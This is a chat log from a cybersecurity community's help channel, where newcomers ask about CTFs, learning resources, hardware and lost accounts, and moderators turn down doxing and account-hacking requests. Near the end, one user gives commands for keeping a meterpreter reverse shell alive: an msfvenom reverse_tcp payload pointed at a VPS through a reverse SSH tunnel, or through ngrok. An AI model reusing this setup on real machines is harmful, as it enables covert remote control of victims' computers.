#👥・help-me

Thx

np

i have forensics challenge can anyone help me with it

we can't solve the challenges for you but we can help if a small push is needed

what do you need?

yeah i just need some assistance

not entire challenge to be solved

can i give other info in the dm?

why not here?

suree

i have .img file and some files are deleted and i need to recover them

A USB drive was being used to store confidential documents and images, but unfortunately, some of the files were accidentally deleted, and the drive has become corrupted. Your mission is to recover the deleted files and extract a hidden flag from one of the recovered documents.

The goal is to simulate the process of forensic data recovery by utilizing available recovery tools to retrieve files from the corrupted drive and locate the hidden flag within one of them.
this is the statement

i see, have you learned about any recovery forensics tools?

yess

have you used them in the challenge? what are they if i may ask?

yeahh

they are ext4magic,fsstat,strings,

extundelete

photorec,testdisk

basically all of the recovery tool

from fsstat i found that only from group 0 and group 1 inodes have been allocated

but when i extract or try to view it shows nothing

and the img file all has a deleted partition table

ext4magic -d recovered_dir -f ext4magic theforgottenfiles.img
theforgottenfiles.img Error 2133571475 while reading inode bitmap
ext4magic : EXIT_SUCCESS

some part is corrupted here and i dont know what's it

can you help me with it

i've researched, and it has something to do with read only permissions

i myself am not good when it comes to full on forensics because i have never done such challenges

but hopefully the information helps: try and research the error on the internet to have a better understanding of why it happens

once you can understand what causes it you'll probably be able to proceed forward

i also found out that to find what exactly is corrupted you can use
fsck.ext4 -v -y theforgottenfiles.img

it also attempts repairs of the files

I used that too

But was not satisfied

i see

I only got some valuable info from fsstat and strings other all were some kinds of errors

it's probably just messing around with flags until you get the right combo

i feel like

because of the corruption

Yeahh

i think they made it intentionally like that

try and play around see what you can do, maybe along side it try and research more tools for file integrity fixing

Yeahh

Let's do research and dig dipper

Anyways heading for swimming right now I will bang my head later😛

Hello any one here want to solve pwn and web challenges I need help it just a uni compition

Anyone is a pro at code I need some help

well we won't solve ctfs for you
and from the looks of it you would need to study pentesting in order to do that so
no way of helping in the heat of the moment, but when you are free you can take a look here to study it #👥・new-member-guide

what's up, don't ask to ask, just ask

Unfortunately, we're not allowed to help with that type of requests

Any organizations that help me?

I just want to report with proof

each and everything

Not sure if any ethical community would help to be honest, we're just not allowed to take it without legal permission
About unethical communities - there is a huge chance to get scammed, so be careful with that (you might get DMs from members of this server as well, they might be scammers too)

Reporting them is a good idea 🙂

@regal estuary hey, we don't allow for any kind of doxing in this server no matter the situation, read our #📜・rules
if you have those details work directly and only with authorized bodies like police.

I eport national telecom company and. Cyber Department and wait for help

That's the right decision, thank you for your understanding!

Can somebody help me in termux doubts

What do u need help with

Termux doubts ??

yeah but what about it, don't ask to ask just ask

^

my bro i asked you over here @stark shell
why do you need to dm me about it

just ask away

OK

But I can't upload anh pic here dude that's the reason

embed it

use imgur

How to do

simply upload your image to imgur and copy the link and paste here

that's not that hard

hey, as a beginner, should i buy thm premium right now or should i buy it later down the road

if you're referring to their academy: then yes you should, they have alot of beginner friendly knowledge you can learn from

but don't take it from me alone yet as i don't use tryhackme, try and wait for more opinions

i forgot my old mobile phone's password :< what to do now?

i dont want to lose my data :<

Learn first without paying then buy later

is there a real way to fully bypass hsts even if preloaded?

Go through the account recovery steps. If all fail you're sol

For those who got into offensive Cybersecurity (red teaming) how did u learn? And what materials did u use to learn it?

Go and do a bachelor in cyber security. And in the free time playing CTF and pursuing certs like OSCP or CRTO.

Serkonian i wanna use the pc for like programming but like what do you mean by gpu heavy work

3d stuff

Like gaming

I think

Ohh

Of video editing

So like game programming require kind of a good cpu?

Yeah, so things like digital art, photo and video editing, 3d modelling etc use your gpu. Streaming also does.

So for programming you're gonna want an okay amount of ram and a good CPU.

Whats the least amount of ram i can get

I wouldn't go below 8 lmao

Personally for me it's 16GB minimum because I like to keep a bunch of tabs open with various browsertools, documentation and research when I work.

So keep that in mind.

So between 32-16 is good

Well not between

Yeah, it should be fine unless you plan on going crazy with it.

If you have a PC rn, you can always run some shit that you'd normally want to use and check the ram usage to get a baseline

I just plan on doing front end/back end for fun maybe malware and different thing yk

I dont

Yeah, so between 16-32gb of ram and a good CPU

Yea

I don't think you need to worry about exactly what CPU model it is unless you have specific requirements you know about already

When i will do research i will just send the cpu and ask if its good

But AMD is better if you plan on running Linux natively on it.

I just want a cpu capable of supporting vm os and thing like that

I might use lite version of linux or just linux but i dont think i need all the tool on linux

Shouldn't be an issue. You can always check the details of the CPU/motherboard to see if they support virtualization.

Yea

You can always just download something like ParrotOS and uninstall the tools you don't need. Can always reinstall them if you regret it.

I just type in « does « cpu name » support visualization »?

Parrot os seem like a good thing too

or install something much more lightweight and configure it all yourself. That's a big sellingpoint for Arch for example.

I dont really have the time for that

I want the os to have some tool there and there

Useful tool

That's perfectly fine. The distro you use doesn't really matter all too much, using linux for long enough will get you tuned in to what best suits your needs

On the parrot website we see the requirement for what you want

Yeah.

Am i better to get it as a virtual machine or live?

Depends on your needs honestly.

Running it in a VM is fine.

But running it natively will give you full access to your hardware.

A lot of this is very dependant on your specific use case.

Okay

Ill start with vm and if i need it live ima just get it live

Thanks for helping me

Just gotta wait to my birthday

I also have a desicion

Do i get a laptop or a car for my birthday

lmao

Depends on your needs, man.

Hi i wanna get into blockchain forensics is it worth it do you guys know anything, btw i have 000 experience on cybersecurity

But i love blockchain and wanna do soomthing around it and blockchain forensics seems pretty intriguing

Which is gonna benefit you the most?

Car would be more useful for college wich i still have a year of school left but laptop would be for fun and enternainement

Car would be for liberty

Hard to make a choice

New here I just finished start point machines on HTB and have done some walkthrough machines and couple of on my own machines on THM. Just looking for friends to grow with or any experienced people looking for pupils! Much love ❤️

Then probably car unless you think that the laptop would help further your career in some way. Also depends on how far you actually live from your college.

As a student though, you should probably prioritize your studies and your career so that you can be financially secure and shit :P

I could by the laptop by myself and ask for some finsncial help for the car

It's up to you, man. I'd recommend you take a moment to really consider any decisions that might leave you with any kind of debt

Yea

This is interesting, anyone has an answer to this?

you could get an old used car on facebook marketplace or smthn for like 800-1000 i think

just keep lowballing till it works

Im taking my brother car but ik this mf will want to scam me 💀

Lets not forget insurance

Hello
Please am into network security
Can anyone help me.

What you're talking about is basically a crypto hacking specialization. To get into that, you first need to learn cybersecurity, then get into cryptography, then learn about blockchain, and finally dive into blockchain forensics

But like I said, it's a specialization. You have to see a specialization like a PhD — meaning, to reach that level, you need at least 6 years of studying cybersecurity and cryptography before you can even start with blockchain forensics. And that goes for all hacking specialties, like IoT pentesting or Windows dev exploits

Be more specific, dude

Tell me what level you're at with networking and what exactly you want to learn

hi heckersss, I can't access Google

log of error ?

internet down?

because i can

No no

hang on lemme send a pic

ok

image quality aint good mb hang on

mhhmh

be careful not to leave me choking here though /j

you can use imgur to embed btw

i'll pretend like i didn't see what was down there

why can't you do the robot check?

My Instagram account just got blocked now who can help me to unblock it

we can't help with that here

as we are not part of the instagram support team

Ok

Yo I got a server I needa crash

...what?

we don't help with any illegal or unethical activities, please read our

Oops, sorry Diss, you got this

#📜・rules

I'm not here

🤣

you're all good if you want to comment lol

oh yeah and change that guild tag please

thank you for noticing @last maple

Can you help me with this so I can learn to hack accounts?

That I am a beginner

#📜・rules

no unethical stuff

bad

https://tenor.com/view/spray-bottle-cat-spray-bottle-spray-bottle-meme-loop-gif-25594440

We don't condone that here

hey newbie here, is there any guideline for ctf or maybe a useful tool for ctf

😭

Hi

hi guys

im puzzled abt smth

basically there is this website where there are schedule of test with a specific time before u get in but before i used a vpn extension and bypass and get in first but now they closed the schedules but somewhat somehow there is someone who managed to still get in first not to mention 3 days ahead so did he mess with the website codes or proxy or smth?

did he get into the system codes and manually open the schedule?

There's a probability he messed with the website codes. Making it difficult for you to get in despite using your VPN stuff like this are common and now probably the codes are scrambled.

Hey everyone, I have a question about reverse connections in remote assistance apps like AnyDesk, TeamViewer, etc.
I've seen videos from creators like Scammer Payback where they manage to reverse the connection and gain access to the scammer's system.

I've been trying to understand how that works technically what kind of methods or tools are used to do that safely ?
I’ve searched a lot but couldn’t find any proper tutorials or explanations.

Could someone please explain or point me in the right direction? I'd really appreciate the help!
Thanks in advance 🙏

i use microsoft's quick assist, it's usually considered safe and i haven't really heard of any special cases

I'm looking to break into threat hunting, any tips/advice would be appreciated as well as best tools and practices

Mostly very specific bugs that aren't public are used

Which is a very grey area

Tryhackme has many rooms to get you started

hey guys i need help

someone logged in an apple account i have never created from my email address

contact apple support

Yo can somebody help me, i think i got an virus on my pc win32:malware-gen

Quarantine it

Just like defender recommends always

Also good to reinstall winfows

Windows

I factory reseted my pc but dont got a usb to reinstall windows just trough windows settings

but removed everything didnt keep personal files safe

I just know the fundamentals of networking …. And I want to focus more on both the offensive and defensive side of network security.

How deep you dive in networking?

The fundamentals
The OSI MODELS, TCP/IP protocol

And how they function in networking.

Hello I need help

https://dontasktoask.com

My Instagram account got permanent disabled

we cant help

contact them

Whom?

@oblique pawn hello sir

@topaz tulip Instagram support can help. Please stop pinging random members.

If they do not help you, you are out of luck.

Anyone promising to return your account for free, or a fee.. they are only out to scam you.

Thanks for advice brother

is there a free certificationn i can get?

Hello guys is there anyone that has an Hackaz0n invite code for signing up?

hello guys i need help with Linux Fundamentals

ask away

what is it

#💬・certs

Ensure your got access to cyber resources @heady eagle

what the important things i need to learn about it because i will die of bored

that why it shows no access

Yes, go to roles and get the cyber access

An answer is there

https://academy.hackthebox.com/course/preview/linux-fundamentals

Someone asked the same question

well
that's part of the deal: learning stuff you might not need sometimes in order to achieve something greater

Free module around Linux Fundamentals

Without knowing what your level of knowledge is, hard to give a fully accurate recommendation tbh

But you can browse that, skip ahead, use what is of use to you

i know searvhing files and traveling too so the basics and bash too

check the module

i heavily recommend

okk

is it free

But.. check other platforms too #💕・free-resources

I said it was free

yes as mentioned by goblin

because tryhackme you need to pay

Depends what you want to access

There are paid modules in HTB also, which tend to be more involved regarding subject

Companies can't give everything for free, and expect to survive

if you want to be ahead of the game i recommend to listen carefully to what goblin has to say, he is a very knowledgable person when it comes to the field

OKK

personal opinion: thm is a lot user friendly than htb(from someone whos still starting out)

👍 all good, each to their own

Just because one thing works for one, doesn't mean it works for all

fair point

i will check it the link you send

That's why I used my get out of jail free card by posting a li nk to the #💕・free-resources channel

(totally didn't link to the wrong channel, and then edit that post...)

👀

how can i get more of this yellows cubes

You get enough cubes when signing up to take the fundamentals modules

Otherwise, you purchase cubes, or subscribe.

they give me just 60

Whatever was given is enough to unlock and use the fundamental modules @next willow - for fundamental modules, you get the cubes back after completing them.

okk i got it after finish it i will get my cubes back again

For fundamental (tier 0) modules, yes

http://help.hackthebox.com/en/articles/5272936-introduction-to-htb-academy#h_6ac6f773e1

It's all documented here

ok thanks

i think im lost can enter the focus room and i will steam for you and you tell me what i need to do

No sorry, it's a Sunday evening, and I'm not here to be a personal tutor

Check out the help articles

where

Read up a few messages...

what'd u need?

can you enter the forcus room so i will stream my screen

im new user of HTB i lost on it

How can i find someone ip just from pic that he send me on tg ?

hey, we don't help with anything unethical please read our #📜・rules

I know but i got scammed and im so mad that i want to find that b*ch

just gotta be more careful next time, don't use telegram for business dealing as it mostly ends up with scams in it 90% of the time

No legit people any more -_-

Everyone try to scam

@eager knot thanks

Unfortunate

Learn from your mistakes and move on

Hey guys, I’ve been getting into bug bounty recently but still haven’t landed my first bounty. I went really deep on a target, even got my hands on the source code, but still came up empty. Any tips on how to finally get that first win?

I know sometimes you just have to be patient, but my current job situation is a bit unstable, so I’m really hoping to have at least a plan B in the meantime

What type of bounty is it

In this case, it was a web app for a cryptocurrency wallet.

uhhh sorry cant help you just because of the nature of the situations since its financial incentives i dont want to risk helping with anything unethical hope someone else can help you out sorry

I can prove that it's ethical, the company 's officially listed on HackerOne with a public bug bounty program

That would be good

Sure. https://hackerone.com/wallet_on_telegram?type=team

If you want, I can tell you how I got the source code

ohhh wallet tg

i saw this one

No need

Okay what one are you doing

are you going for apis or payment, messaging related ?

I first started with the domain, but later I began looking for something that could potentially affect clients, like account takeovers or smth similar

thats good but i dont think you would find any ATO vulns maybe seed phrasings or draining could be possible or session hijacking since its telegram

What was the initial source code and what is it for

What caught my eye as potentially vulnerable (according to Semgrep lol) was the implementation of the print export function from MUI’s DataGrid.

Other than that, it was just the app’s code, but I didn’t find much

That function is sometimes called a watchlist, It wont be the best part to start because MUI tables are usually very careful based of dom based xss. I wish it was that easy you could scrape up anything from names to transaction messages but i would assume wallet tg is careful with their logic abuse

Which would make sense

make sense

going back to your initial problem if your looking for making good quick money what i done was i went with wordpress, I contacted a bunch of agencies with horrible plugin configurations and offered my service for quick fix

even wp-cli was easy because of the multisite installs

But something like wallet tg and its vulnerability class like trying to find user data or any moderate stuff like sql injections to xss up to vulnerabilities it will always have that problem of not being able to find anything. You could most likely make like 100$ and that would be anythign from agent logs or misconfigs which shouldnt be worth your time

What i said and done would be most likely your best approach

in my opinion

Sorry i couldnt help with ur exact question such as landing your first win but thats the best advice i could give

No, seriously, I'm actually really grateful. You helped me a lot. TYSM🙏

No problem man Good luck ❤️

Mind adding me as a friend here?

Of course i wouldnt

Lemme add you

Ty

No problem

Hey I’m looking for a cyber mentor if your interested hit me back 👀

No point of having a specific "mentor" You could always just ask questions openly to this community everyone here is helpful and will help you out

nobody does mentoring for free, and people who will ask for money can scam you over discord

as Kat said, ask here and we answer

righto
so i got an offer to renovate a company's website, they want to keep the structure mostly the same but change some of the icons, menu bar, and update their gallery.

problem is, they lost contact with the third party they hired to make the website, is there any way for me to pull the website source code? it's a display website with no login functions or any data storage though it does have some subpages

Can i learn hacking for free

yo guys
i need help with an osint
i got this image

I need 20 or 10 box plz anyone to help

Hi guys any punter here ? I need some help in punting on football and soccer anyone?

Hello guys
Am into network security … and I want help. I just have the basic knowledge of networking, the OSI models, the TCP/IP Protocol and how they function. I want to focus on both the offensive and defensive side of network security.

Heya, I teach offensive network security on my channel, I'm making short format videos quickly teaching different attacks and fundamentals. https://youtube.com/@kvt5
https://youtu.be/ahGhnqsfVwM?si=M4M2lVzw0WcU7_Xl

Except from that, tryhackme has rooms for wifi hacking/ network penetrating testing, and defensive security

Thank you boss.

But can I dm you
So you send me your teachings
Or?

I already did, i don't have any other guides, I just lurk in these chats and answer questions regarding network offsec and other

if you have some question yeah feel free to dm me!

I just finished your video

Which means … if I want to start with network offensive … hackthebox is the platform for that.

well I only went over the theory I this vid

But how do I also know that
What am learning is network offsec

next video I'm gonna go over all protocols and their exploits, and the vids after that I'll show how to perform attacks

wdym how do you know

In hackthebox, it basically teaches you all about networking right
So how would you know which is the offsec and deffsec

the module I showed is only the networking theory

how it works

not offensive neither defensive side

and regarding which one is offensive and defensive, you'd realize whole you'd be reading about the module. "This exploits the network" "this starts an attack on the network" or "this secures the network" "this prevents hackers from doing x to the network" etc

Oh okay … which means
Your next video will be about the defensive and offensive part or it.

no

.

still theory

in the third vid I'll be showing attacks in practice and how to create them

Okay sir.

But please sir, I would still like to dm you
If it’s okay with you

So there … you could give me more tutorials when you release them

yeah sure

I mean just turn on notifications for my channel lol

you'll be notified when I post a vid

Okay

Anyone with programming experience able to answer a quick basic question on logical operators?

you might wanna ask that question in chatgpt first

Anyone has experience or having an AI model. Reply to you and PA. Language so old.
That the platform himself cannot flag the context of the sensitive information. That's being used discuss. Currently, in one of my projects, it is replying in key code in the bangla language. Very weird, just wondering if anyone here is having the same issues as I am having. Also, before this happening, it would keep repeating on loop a disclaimer. 🤷‍♂️

Hey, I need desperate help. Someone has gained remote access to my devices, running virtual machines, running scripts to change webpages and what I can see, hidden administrator accounts I cannot remove. Even Microsoft couldn’t help me. I’ve replaced my devices, phones, laptop I reinstalled windows from a flash drive, everything. They still find me and hack me. Please help

we cannot help you bro

Where can I get help?

You tried everything

wow

who have u got on ur ass

xD

did u try running linux instead

clearly persistent malware, could be in the motherboard

some might not be compatible iwth both

if they are, get completely new devices

and factory reset your network

and do not use it before u factory reset the router + all devices again

Probably a kernel rootkit or firmware level rootkit

Who needs a VPS I’ve got one for sale

Na we good

Not here

Hello brother can you help me

Quick question: I’m new, but I could use some advice if you’ll don’t mind. I’m new to the cybersecurity world and need a little guidance/help.

Check this out: #👥・new-member-guide

dontasktoaskjustask.com

How can i recover my lost what'sapp account

My question is more geared toward a college degree question

We're not allowed to help with that

Maximum I can say - contact the whatsapp support

I’m was thinking grc but unsure

Oh, okay, pretty sure I'll not be too useful here, sorry :>

Ok thanx where should I look if you don’t mind please and thank you

You're in the right place! We have a lot of highly experienced members who will get to your question soon

Ok awesome thanks so much I appreciate that comment I’ll definitely keep watching and waiting

Thank you and welcome 🙌

@everyone i need a help if you could
i had a application named codetantra sea
which blocks screen sharing and everything no copy and pasting
but i want to share my screen how can i do it
i want to take screenshot there how can i do it please help me

Dont just ping everyone

I dont think its fair everyone snooping what we do on internet, its honestly funny how much info is out there. I have honest question how do you completely stay private tails os?

Hello everyone can anyone help me in writing the report for exam

air gap?

just private?

way easier than staying anonymous, especially if hiding from goverments for example

just to not get tracked, use privacy badger, hardened firefox, and any base tier vpn is enough

proton for example which has decent policies

i just i just finished Working with Files and Directories in Linux. now i know why people said to me start with linux Fundamentals yeah its boring but if you want to do what you love to do,you need to do what you dont love to do

Librewolf is my honey bun ❤️

Nothing comes inbetween me and my libre

Guys sorry but this isn't a job offer lol, my monthly wage is equivalent to ~120$ per month and they're paying me $200 for this project so i can't pay jack

Hey family, who knows about evilimiter ?

Building a faraday cage big enough for me to fit inside. Was gonna use copper screening but does anyone have any pointers for maximum ability?

is python 3 in HTB academy module just introductions to python just with a newer version?

hey guys, I am basically a complete beginner at any of this. I can read/write really basic html doc or understand SEO to a certain extent but thats about it. I was interested in gettting into while label software, anyone here have experience making a dollar doing that?

How can i let chatGPT control my pc?

I'd love feedback on this idea from anyone lol

Hello, does anyone know how to downgrade the python version on kali

you can run different versions just by specifying it

How?

type python into your terminal, then press [tab] to see what versions you have installed

python9.3 program.py #example

I got 3.12.0 and 13

#OR
python1.3 [file].py```

Thankyou it worked

I still want feedback for this # anyone

The file I have here cannot perform it task . I get error messages anytime I use it

That’s a great question. One approach might be to structure the prompt so that it always outputs commands in a predictable format, making them easier to detect and extract.

This way, you create clear boundaries that you can identify using tools like cut (which extracts specific parts of lines). You could then write the command to a file and execute it.

Hi everyone

Can you please give me tips on how to start learning code if you may?

what language?

Learn python as starters and make way to C++/java with DSA if you wanna try web learn html,css,javascript/php

mostly if you are in cyber you will come across these lang frequently

you can also try reading C# and assembly

just learn to understand the code

Nah. It should be ran with 0 overhead to really get the Jarvis experience

Hey

I need help

Is anyone available to help me?

With?

@gritty maple ?

My Roblox account I think someone changed the gmail and the password I can give u the old password and the user

I have proof it’s my account

I am trying to sell it

And my friend doesn’t wanna hack it he says I should learn and stop being lazy even tho I make more money then him x enough

Can anyone help?

I find using vpn is super slow and prevents me from using the internet, what’s the right way to use it ?

Contact Roblox support

Of course I did that

Didn’t work

It's most likely over then

Consider changing your VPN provider or play with their servers, see what's the best choice for you

Soo here's my problem it's not mine but the dude who got scammed bet on me;

There is a person claiming to be a store selling the digital currency USDT, and it turned out that he is a liar and is using a fake number on WhatsApp. I just want to know his location because he is from another country and not Britain, according to what the number code +44 shows. If you are interested, please help me

#📜・rules

Bro ik that's why i came here , he lost around 1m , 80 dollar in Us dollar , it's like a money could save his life

We want to report directly on him without being known to track him or report him

Any one ?

Is there any difference between IT and cyber sec

Do you want the long explanation or the short one ?

Short

IT is about building and maintaining computer systems and networks
Cybersecurity is about protecting those systems from threats like hackers and viruse

👍🏽

Oh thx I understand now

Np

IT is the overall definition of tech imo, cybersec is a section in it

Hi everyone solid question here; but does anyone have any advice; for a person headed into college c/c then uni but trying to figure a major. I know I want to be in cyber tech but I’m un sure what to look for any advice would be appreciated. I’ve thought of grc but unsure; so let’s see I’ve thought of grc ,cyber security b/a in it the master in homeland security for terror attempts against us and I’ve been told to do information systems Btw I’m looking at Texas a m and Sam Houston and u of h and lonestar as my c/c

hm

there is so many diff things you could do in cyber

id have a genuine look at everything the diff avenues

you dont wanna pour 3 years your life into goverance and compliance and hate it

make sure you check all the options.

I’ve been looking at so much stuff lately but I’ve been hearing so many different stories about it so I figured I’d share my story with here that actually does the tech job

I’ve looked at grc and cyber security i.t and homeland security and penetration testing and id really love to do cyber warfare or real time counterattacks I really do love my tech

Well based on what you said you may not like grc as it's not really a technical position it's more policies and documentation ALOT of documentation one of the most popular choices would be working as a SOC analyst you'd learn alot and then can pivot to other roles from there also while in college and learning you should put together a homelab that showcases skills in the career path you choose like a soc sim or just to showcase your pentesting skills and a relevant certification also something cloud related and your golden!

Omg this is so valuable to thank you so much I’m writing this down and what do I need to pick for community college I think it’s aas but unsure and then what should I major in oh and I’ve talk to Apple Store people they said the Mac book pro would do great for me through c/c and uni

And as setting up a home lab that would be multi monitor setup correct and maybe a computer tower?

I'd go for a good windows laptop over a MacBook of course the apple store would tell you that they want sales... and install linux you're gonna want to be familiar with that

Do you have a good idea of what windows laptops would be good since I’m just starting c/c

Where can I get best bug bunty course

Hackthebox imo

What tools/software should I learn to use as someone who is interested in cybersec?

That's pretty vague

Start with nmap

I'm already familiar with that

I also know the basics of metasploit

And very basic knowledge of burpsuite

I think I could use some advancing in this one

hello everyone. So i recently finished a bootcamp, and i know i want to go into the incident response side. what career path should i take? i've been working on my resume, but i would like anyone that already has had experience in that specific path.

Thanks

You can try out one of them each time and find out what you like

Hi, can someone please show me where I can download paid MacBook apps for free? I want to download Dr.fone premium but it’s paid

Do mean like in a home lab or……

Do mean like in a home lab or……

#📜・rules

looking for help

With?

for sum reason iam not get in my accounts

On what, Facebook, Instagram?

on my Microsoft a dont use Facebook or Instagram

Reset your password

it not send any codes

Is your account still connected with your email?

yes

Try waiting a bit or using another option like SMS

ok

Is it possible to invest time into a beginner cybersecurity course and start building a resume early for my senior year to have decent experience or some certifications?

#👥・new-member-guide Both THM and HTB are great options

yes, it’s not only possible, it’s a great move

No, #📜・rules

👀. I’ve been in this server for a while, and i’ve seen it grow a lot. Any guidance would be helpful.

Who’s in NYC wanting to teach?

Nobody will teach you for free

Beware of services that are too good to be true too

I’m kind of aware it won’t be free.

Thank you very much 🙏🏽

wonderful, I gotta stay committed overtime then 🙌

im starting from scratch but i do know a bit of python but ive always been interested in cyber security and i was just wondering does anyone have a beginners road map like im not really sure where to begin and my goal is to work up to a cloud security engineer

try looking roadmap.sh

what can be done about wedsites scamming people?

Heyy guys 👋 I was curious to know what would you do if someone keeps harassing you & calling yu from different numbers # pls help 😫

How do y’all handle persistent reverse TCP connections using DDNS (like DuckDNS/BackDNS) when there’s no port forwarding or router access? Like with a msfvenom payload using DDNS as LHOST, how do you keep the meterpreter session alive if the listener's IP keeps changing and there’s no static route? 🔁 Any SSH tunnel tricks, FRP, or other methods to bypass that?

cant you use reverse ssh tunneling (if target can initiate outbound SSH connections)?
ssh -R 4444:localhost:4444 user@your-vps
then
msfvenom -p windows/meterpreter/reverse_tcp LHOST=your-vps.com LPORT=4444 ...

or even easier using ngrok
ngrok tcp 4444 or whatever port

• generate a msvenom payload with your DDNS as a LHOST
• then use revere SSH tunnel or maybe some FRP client to VPS
  summary:
  Meterpreter connets to your DDNS, tunnel sends it to ur home and you catch the session even if your IP changed

I think there was an option to silence unknown callers

Reporting them to the police

Consider changing your phone number and reporting them

Bro wtf thats illegal af

Hi everyone,

I'm conducting academic research for my thesis on zero trust architectures in cloud security within large enterprises and I need your help!

If you work in cybersecurity or cloud security at a large enterprise, please consider taking a few minutes to complete my survey. Your insights are incredibly valuable for my data collection and your participation would be greatly appreciated.

https://forms.gle/pftNfoPTTDjrBbZf9

Thank you so much for your time and contribution!

Help me find a hidden message in an image

Dm for the image CTF

Send it

We're not allowed to solve it for you, but I'll give you a nudge

how do i get permission on kali

for ifconfig eth0 down

I want to buy atheros ar 9217 tht wifi adapter but some reviews are positive and some negative idk to buy or not and what would be the best site to buy? Guys help me

I message someone from video game who sell some account on the video game I played and he said he did not hacked account one by one but instead he get a files with list of an account. How does he do that? How's that possible

ehat

Hello guys

I need a good hacker

Have a big deal for em

nothing unethical here buddy

Hello guys

I have a small wordpress questeion ( IK, that wordpress isnt real coding but still)

I need a bit help for work. I try to creat a dropdown menu with dependencies. I want that one is then like a parent and the child dropdown is dependending on the parent

can't you just use plugins? like WPForms?

OR this:
https://www.youtube.com/watch?v=44dJwP1AXT8

Hi guys I have this iphone xr that i found on the bus and i want to hack into it to reset the phone and possibly sell it. Can anyone help me havk into it

when you join the server you have some #📜・rules to read btw :))
read it once again ❤️

I use the Form 7 Plugin, but if I try to use other plug ins my Form crashes

u gotta write a JS then

Nice, thx

you can find some example JS codes on the internet but if you need help then try writing in #💬・programming

can anyone solve that in HTB ?
he VPN Server is currently unavailable. Please try again later.

is it legal?

I wrote one myself, I am currently debugging it

dangers of using "eval()"?

So what can I do to flash my bios on when someone set up an administrator user blocking access from the uefi, I’ve took the a battery out, reset the cmos, Tried to download a fresh version from Microsoft, use a usb with a clean install and nothing… I’ve been able to reset it before as this has been persistent issue but now it is looking more like firmware corruption.?

its just stupidly easy to inject malicious commands if user input is not strictly controlled

if you have to use it then NEVER pass untrusted input to it

in simpler words control user's input

No soliciting for hacking services. You're on 2 strikes

It does sound like you’re dealing with a more serious firmware issue, possibly corruption, especially if removing the CMOS battery, resetting the BIOS, and attempting a clean install via USB haven’t worked.

Check for BIOS Recovery Mode, Use Manufacturer’s BIOS Flash Utility, Replace the BIOS Chip or Reflash with Programmer, and Contact Manufacturer Support

you're not real

Can someone help me understand networking in a very detailed way please

you have already said this before

the answer was no

hello

i recommend watching a youtube tutorial for this, it should be easier to understand

i did the os on a stick thing with linux mint using a 16 gb usb and i used up every byte and now i cant use it is there a way to remove winehq from it

Can we use wifi card in the newer laptop for packet injection or wifi deauther

most laptop chips dont support it no

i suggest u use a lighter os

what package manager did u download wine with?

noble via debian/ubuntu

Hey guys, I just received my Wi-Fi adapter, the Archer T2U Plus. The thing is, I'm on a Mac M1 Pro and I can't get it to work or install the drivers on macOS. Also, when I try it in Kali Linux, the adapter isn't recognized by iwconfig

u have to install drivers in Kali

for most Wi-Fi adapters (from my experience)

i tried to check on kali but it does not appear when i do lsusb

do you have any youtube recommendations by any chance

Hey All, I am wondering if anyone could change my opinion about Ai. So far I see a lot of negative rather than positive in both cybersecurity world and how Ai is beginning to affect my current job. I have started getting depressed about it both for economic factors but also cybersecurity factors as well. I have taken Ai classes and other areas of learning to skill up for Ai. However I feel it is not enough. If anyone has positive thoughts on Ai, or recommendations. Let me know. I would really like to change the negative mindset I have about it because I know there is some good and has made my job easier in some ways.

Whats a good app to help u code on mobile

Well so u can learn the language

A mobile app to practice coding an learn? or any app to help you code mobile programs?

Learn

I already have replit to code

Im missing the skill

i always recommend sololearn, free / subscriptions, you can challenge others, it has like a small social media area to share your code

Should learn swift

Thanks i will test it tommorow

Hey everyone, I hope y'all are doing great, can u guys suggest me any tool or script to send silent SMS to know if a SIM is active or not

We good

Not here lil bro

You lil bro

With the Snapchat avatar

I said what I said

Enough said

Big bro is that you?

Yea maybe

Had to leave man

Had to use that as a cover up

To leave the house so when she found it she thought I left for that reason

Wth💀

💀

Well idc what dad thinks im gone living my best

wishing well

https://tenor.com/view/solo-leveling-statue-of-god-gif-14621948488655819220

Welp

That’s that

Hey greetings all which app can I use to get verify my Whatsapp via foreign number instantly once I came across sucks help me please

Make sure to sanitise input if you use input fields on ur site to avoid SQLi if ur going to be using a database to store credentials or whatever to login and etc

learn how to identify liquidity and watch some supply and demand videos

is here anyone

You’re aware that this is a CyberSec server right?

Maybe you should look for trading advice in a trading server

I used to trade full-time for a living

On and off last 8years

Wrong place to ask

Everything you’re looking you can find for free online

Honestly trading is a get rich slow scheme id higly recommend you get a regular job and do some long term investing instead

95% of it is fake

I know tha company pay them to say stuff

But it's good to learn

I will look on YouTube

Tnx for the information @tidal bay

Thank you

Np, keep in mind that there's still alot more u need to keep an eye out for aswell

I'll be sure to ask if I'm stuck on something

👍

Hello everyone! I'd love to attend defcon 33 this year, the price is a bit high for the salaries in my country, are there any discount codes I could use?

My Linux kernels were wiped out of my machine. I cannot access the Internet to reset the kernels. I tried downloading the kernels on a USB drive but I am running into trouble with that. I changed my operating system from fedora to Ubuntu and it still does not work. All these problems came about when I installed a virtual machine and uploaded a windows 11 iso. I need help to get back on track. Can someone help me?

dont dm him

Recently found a scam that lots of people on LinkedIn have applied for and I want to make post addressing the issue but I'm pretty anxious I'll be harassed if I call them out in a post. Then again so many people have lost money already now idk what to do.

Hi guys how can i distroy an illegal link that take you photo

i used this spy hunt then it shows page does not have form but it had feed back form on page i donot know why error is comming

Report it to police

I love the fact that you're trying to spread awareness, that's nice!
Consider reporting them to Linkedin tho, that way you will not get in troubles 100%

Probably the tool is seeking the <form> tag, which might be missing

I’m new and I’m studying software engineering first year, I was interested in ethical hacking and how it works, I also want to get better at coding (python, sql) anything that would make me stand out from other people, recently I’ve been lazy and I haven’t been trying as hard as I normally try to finish my assignments and study for exams so I just want to study hard and just get good as I need to be what can help me?

Guys please I need someone who can help me retrieve a mail from my dads email account.
Please I don’t know the logins to my dads email.
Can anyone help me please

Why

Guys i am new to cyber security and ethical hacking kinda stuffs is there any one who can give me a roadmap to follow ....

https://roadmap.sh/cyber-security this was posted in the chat earlier:)

Please trying nà get paid we got carders in here?

Please who knows site to download free ebooks

Hello all, im trying to find resources on windows internals for offensive security with similar in depth knowledge as whats found in https://blog.whiteflag.io/blog/weaponizing-windows-rpc-interfaces or other blogposts similar to this one. Im trying to learn about lsass, how authentication as implimented in windows in general / the whole stack.

I know of windows internals by Pavel Yosifovich - would people say this resource is still relevant/as up to date for windows 11 ?

My friend has a problem and I’ve tried all the possible solutions to fix it for him, but nothing worked. Is there anyone who can help me? It seems like a simple issue, but I’ve tried everything.

Windows cannot access the specified device, path, or file. You may not have the appropriate permissions to access the item.

Let me know if you’d like to add more details about the problem so the message is clearer for others who might be able to help.

